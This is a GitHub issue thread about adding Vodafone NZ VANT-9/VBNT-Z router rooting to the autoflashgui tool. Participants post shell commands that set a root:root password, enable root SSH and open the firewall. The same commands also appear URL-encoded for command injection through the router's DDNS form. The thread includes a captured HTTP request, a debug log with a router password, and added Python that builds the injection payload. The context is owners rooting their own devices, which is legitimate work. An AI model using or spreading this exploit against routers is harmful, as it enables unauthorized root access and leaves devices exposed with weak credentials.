mswhirl/autoflashgui

[ENHANCEMENT] Add support for VANT-9 and VBNT-Z (Vodafone Ultra Hub & Ultra Hub Plus) from New Zealand

Opened this issue · 4 comments

Discussion & commands here: hack-technicolor/hack-technicolor#68

@mswhirl - let us know if this would be reasonably easy, or quite a bit of work?

If it helps, I can send you a wireshark trace of the login process, firmware flash form post/response, and DDNS form post/responses? And some screenshots

Line: variant=DGA0130VDF Vodafone 17.1.7988 (root) Advanced DDNS,AdvancedDDNS,www.DynDNS.org,sleep 30;
mainscript host: 192.168.1.1
mainscript username: b'vodafone'
mainscript password: b'fxXfjhUwENKn'
mainscript flashFirmware: 0
mainscript upgradeFilename:
mainscript flashSleepDelay: 120
mainscript activeMethod: AdvancedDDNS
mainscript activeCommand: sleep 30;
mainscript splitCommand: 1
mainscript ddnsService: www.DynDNS.org
mainscript connectRetryDelay: 5
mainscript interCommandDelay: 5
Connect attempt 1
<Response [200]>
Modem up
Authenticating
Authentication failed, debug values are: ['Got CSRF token: 1e636dfeed589dcd4a6253d6b73bafa7040eb59a19007dc43d3d26fe99470819', "A value b'877b7d4b6bba5eeebc07da61ce4cca5f6690056fade94e8cb14d7208c4291d5dc8f2fb2edecf285042f84db5021f5cf15835d97b0ea4f53ca9c5f5327f748f4a4629d33e3af806db6dc71f99763e4713e2fa2b69dd5514a3304846a17dceb4b5e43bd2860bebde6aa030fc04fa3596e9a9036b259119f189dec0e8f3ce6e6b3acc414b866ae62ab32834b2908a55de1eb4dbead33a361d0b4788a5b8992be9dcf6ff882b622384c2987f22dfa573e892beb090ce7300215780996f58a420203418b038fe2453fb3edfdb89cc3ea5a958c98f2f59fa0a681769ec94309afde7e568bc9a1417c390c2b8ac2b35e0ec0b063707c94d02e289e9e8a4053589b3c6f2'", 'br.response <Response [200]>', "Challenge received: {'error': {'msg': 'failed', 'waitTime': '7', 'wrongCount': '6'}}"]
Exception: <class 'KeyError'>
Exception in Tkinter callback
Traceback (most recent call last):
File "/home/henry/Documents/vodafone hack/exploit/theirs/autoflashgui/libautoflashgui.py", line 37, in srp6authenticate
M = usr.process_challenge(binascii.unhexlify(j['s']), binascii.unhexlify(j['B']))
KeyError: 's'

this is where I'm at currently

Tested on firmware: RC2.4.6_prod_AUTH_vant-9_17.1.7988-2461009-20180510014336.rbi / 17.1.7988-2461009-CRF846-V2.4.6
The commands needed to root, bring up dropbear and allow ssh through the firewall (user/pass: root:root), each with a loopback char of Y. You could also just look for the success JSON in the response.

sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd;echo Y
echo "root:root" | chpasswd;echo Y
uci set dropbear.wan.enable='0';echo Y
uci set dropbear.lan.enable='1';echo Y
uci set dropbear.lan.PasswordAuth=on;echo Y
uci set dropbear.lan.RootPasswordAuth=on;echo Y
uci set dropbear.lan.RootLogin=1;echo Y
uci set firewall.Allow_SSH_Vodafone_lan.target='ACCEPT';echo Y
uci commit;echo Y
echo > /etc/dropbear/authorized_keys;echo Y
/etc/init.d/firewall restart;echo Y
/etc/init.d/dropbear restart;echo Y
sed -i 's/#//' /etc/inittab

Or, formatted for injection:

%3Bsed+-i+'s#root:%2Fbin%2Ffalse#root:%2Fbin%2Fash#'+%2Fetc%2Fpasswd%3Becho+Y
%3Becho+"root:root"+|+chpasswd%3Becho+Y
%3Buci+set+dropbear.wan.enable='0'%3Becho+Y
%3Buci+set+dropbear.lan.enable='1'%3Becho+Y
%3Buci+set+dropbear.lan.PasswordAuth=on%3Becho+Y
%3Buci+set+dropbear.lan.RootPasswordAuth=on%3Becho+Y
%3Buci+set+dropbear.lan.RootLogin=1%3Becho+Y
%3Buci+set+firewall.Allow_SSH_Vodafone_lan.target='ACCEPT'%3Becho+Y
%3Buci+commit%3Becho+Y
%3Becho+>+%2Fetc%2Fdropbear%2Fauthorized_keys%3Becho+Y
%3B%2Fetc%2Finit.d%2Ffirewall+restart%3Becho+Y
%3B%2Fetc%2Finit.d%2Fdropbear+restart%3Becho+Y
%3Bsed+-i+'s%2F#%2F%2F'+%2Fetc%2Finittab

I have confirmed these commands can be executed manually and work through the web UI on this firmware.

DDNS Request:
POST http://192.168.1.1/modals/dns-ddns.lp HTTP/1.1
Connection: keep-alive
Content-Length: 232
Accept: */*
Origin: https://192.168.1.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://192.168.1.1/
Accept-Language: en-gb
Cookie: webui_language=en-us; sessionID=d937126e96d3b948ceaff4398b9c329aa00d87342eb9d3b38e832b92df24b719
Host: 192.168.1.1

ddnsStatus=1&ddnsService=dyndns.org&ddnsDomain=test.com&ddnsUsrname=user&ddnsPswrd=pass&securedns=0&action=SAVE&CSRFtoken=a1a717126289a0062708bc3396761d3a4ed94b2b0abdd3b84089bd7de07b46b2

DDNS RESPONSE:

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 15 Sep 2019 12:43:50 GMT
Content-Type: application/json
Connection: keep-alive
Content-Security-Policy: default-src 'self';script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline';
cache-control: no-cache
Content-Language: en-us
X-Frame-Options: SAMEORIGIN

{ "status":"success" }
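Two pieces of this comment in working code, as an added example (not code from autoflashgui, the VANT-9 fork, or the thread's participants): first, handling of the SRP6 challenge reply so that the lockout object {'error': {'msg': 'failed', 'waitTime': '7', 'wrongCount': '6'}} shown in the traceback is reported with its waitTime instead of failing with KeyError: 's'; second, the encoding that turns the plain command list into the "formatted for injection" lines, joined into a single DDNS form body shaped like the captured POST. The field the payload is appended to (ddnsDomain by default) is an assumption for the example, since the thread does not say which field carries the injection; the other field values are the ones from the capture.

```python
"""Added example for the thread above: parse the modem's SRP6 challenge
reply without tripping on the lockout error object, and build the
percent-encoded DDNS form body carrying the rooting commands.
Not code from autoflashgui or the VANT-9 fork.
"""
import binascii
from urllib.parse import quote_plus


def lockout_info(reply):
    """Return (waitTime, wrongCount) as ints if the modem answered the
    authenticate request with an error object, else None.

    The thread shows the shape: {'error': {'msg': 'failed', 'waitTime': '7',
    'wrongCount': '6'}}. The original srp6authenticate indexed reply['s']
    straight away and raised KeyError on this reply.
    """
    err = reply.get("error")
    if not isinstance(err, dict):
        return None
    return int(err.get("waitTime", 0)), int(err.get("wrongCount", 0))


class ChallengeRejected(Exception):
    pass


def parse_srp_challenge(reply):
    """Return (s, B) as bytes from a successful challenge reply, or raise
    ChallengeRejected with the lockout details so the caller can sleep for
    waitTime seconds before retrying instead of burning more attempts."""
    locked = lockout_info(reply)
    if locked is not None:
        wait, wrong = locked
        raise ChallengeRejected(
            f"modem rejected the challenge (wrongCount={wrong}); retry after {wait}s")
    try:
        return binascii.unhexlify(reply["s"]), binascii.unhexlify(reply["B"])
    except KeyError as missing:
        raise ChallengeRejected(f"challenge reply has no {missing} field: {reply!r}") from None


# Characters the post's "formatted for injection" lines leave as-is; every
# other non-alphanumeric character except "_.-~" becomes %XX, and space "+".
INJECTION_SAFE = "'#:\"|=>"


def encode_injected_command(cmd):
    """One shell command -> the %3B-prefixed encoding used in the thread.
    The leading %3B is a ';' that closes whatever value precedes the injected
    text in the form field, so the command runs as its own statement."""
    return "%3B" + quote_plus(cmd, safe=INJECTION_SAFE)


def build_injection_payload(commands):
    """Join every command into one string, to be POSTed once (the later
    comment found a single submission followed by a 30 s wait most reliable)."""
    return "".join(encode_injected_command(c) for c in commands)


def build_ddns_form(csrf_token, payload, inject_into="ddnsDomain"):
    """application/x-www-form-urlencoded body shaped like the captured DDNS
    POST, with the already-encoded payload appended to one field.
    inject_into is an assumption for this example: the thread does not say
    which field the injection rides in."""
    fields = [
        ("ddnsStatus", "1"), ("ddnsService", "dyndns.org"),
        ("ddnsDomain", "test.com"), ("ddnsUsrname", "user"),
        ("ddnsPswrd", "pass"), ("securedns", "0"), ("action", "SAVE"),
        ("CSRFtoken", csrf_token),
    ]
    parts = []
    for name, value in fields:
        encoded = quote_plus(value)
        if name == inject_into:
            encoded += payload  # payload is percent-encoded already
        parts.append(f"{name}={encoded}")
    return "&".join(parts)


# The command list from this comment, as plain shell.
ROOT_COMMANDS = [
    "sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd;echo Y",
    'echo "root:root" | chpasswd;echo Y',
    "uci set dropbear.wan.enable='0';echo Y",
    "uci set dropbear.lan.enable='1';echo Y",
    "uci set dropbear.lan.PasswordAuth=on;echo Y",
    "uci set dropbear.lan.RootPasswordAuth=on;echo Y",
    "uci set dropbear.lan.RootLogin=1;echo Y",
    "uci set firewall.Allow_SSH_Vodafone_lan.target='ACCEPT';echo Y",
    "uci commit;echo Y",
    "echo > /etc/dropbear/authorized_keys;echo Y",
    "/etc/init.d/firewall restart;echo Y",
    "/etc/init.d/dropbear restart;echo Y",
    "sed -i 's/#//' /etc/inittab",
]

if __name__ == "__main__":
    token = "a1a717126289a0062708bc3396761d3a4ed94b2b0abdd3b84089bd7de07b46b2"
    print(build_ddns_form(token, build_injection_payload(ROOT_COMMANDS)))
```

Two caveats that follow from the later comment: the modem runs the injected commands twice per POST (at roughly +11 s and +23 s), so everything in the payload must be idempotent, which the sed, uci and echo commands above are; and the challenge lockout counter only resets if you actually honour waitTime, so a retry loop around parse_srp_challenge should sleep for that many seconds rather than hammer the authenticate URL.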

There is a working fork for VANT-9 here now: https://github.com/jameskeenan295/autoflashgui
but the commands need to be run multiple times to take effect before the ssh shell starts working, so it's still a work in progress.

Did some more testing today and noticed a few interesting points about the rooting process through ddns command injection.

  1. On VANT-9 and VBNT-Z the commands have a large delay from when the POST is sent before they execute. I observed the delay by posting lots of curl commands and then measuring the delta between the timestamps of the POST and the web server logs.
  2. VANT-9 and VBNT-Z both execute the commands twice for each post to the ddns form. The first executes at +11 sec, and the second at around +23 sec.
  3. The command length (POSTed to the ddns form) can exceed 1024 characters (I tested various lengths using curl commands).
  4. The easiest method is to submit all the commands in one go, with semicolons between them, and then have the patience to wait at least 30 sec before testing it.
  5. VBNT-Z uses different ddns and firmware upgrade URLs to VANT-9.

Rooting process is working reliably now for both router models, using default ssh port 22.

To keep things simple for merging the fork back into mswhirl's code later I've removed the http server component of the AFG fork, and updated defaults.ini with two new entries:
DNA0130 Vodafone NZ 17.4.0182-0841014
DGA0130 Vodafone NZ 17.1.7988-2461009-CRF846-V2.4.6

Recommendations are:
Untick the "split the given command on semicolons..." option in the AFG GUI (or set defaultSplitCommand=0 in defaults.ini)

Or you must use defaultInterCommandDelay=30.

Some other minor changes to libautoflashgui.py:
Added timestamps to all the print commands.
Added additional URLs for firmware flashing VANT-9 and VBNT-Z. The flashing process doesn't work yet through AFG; I just get: 500 Internal Server Error

https://github.com/jameskeenan295/autoflashgui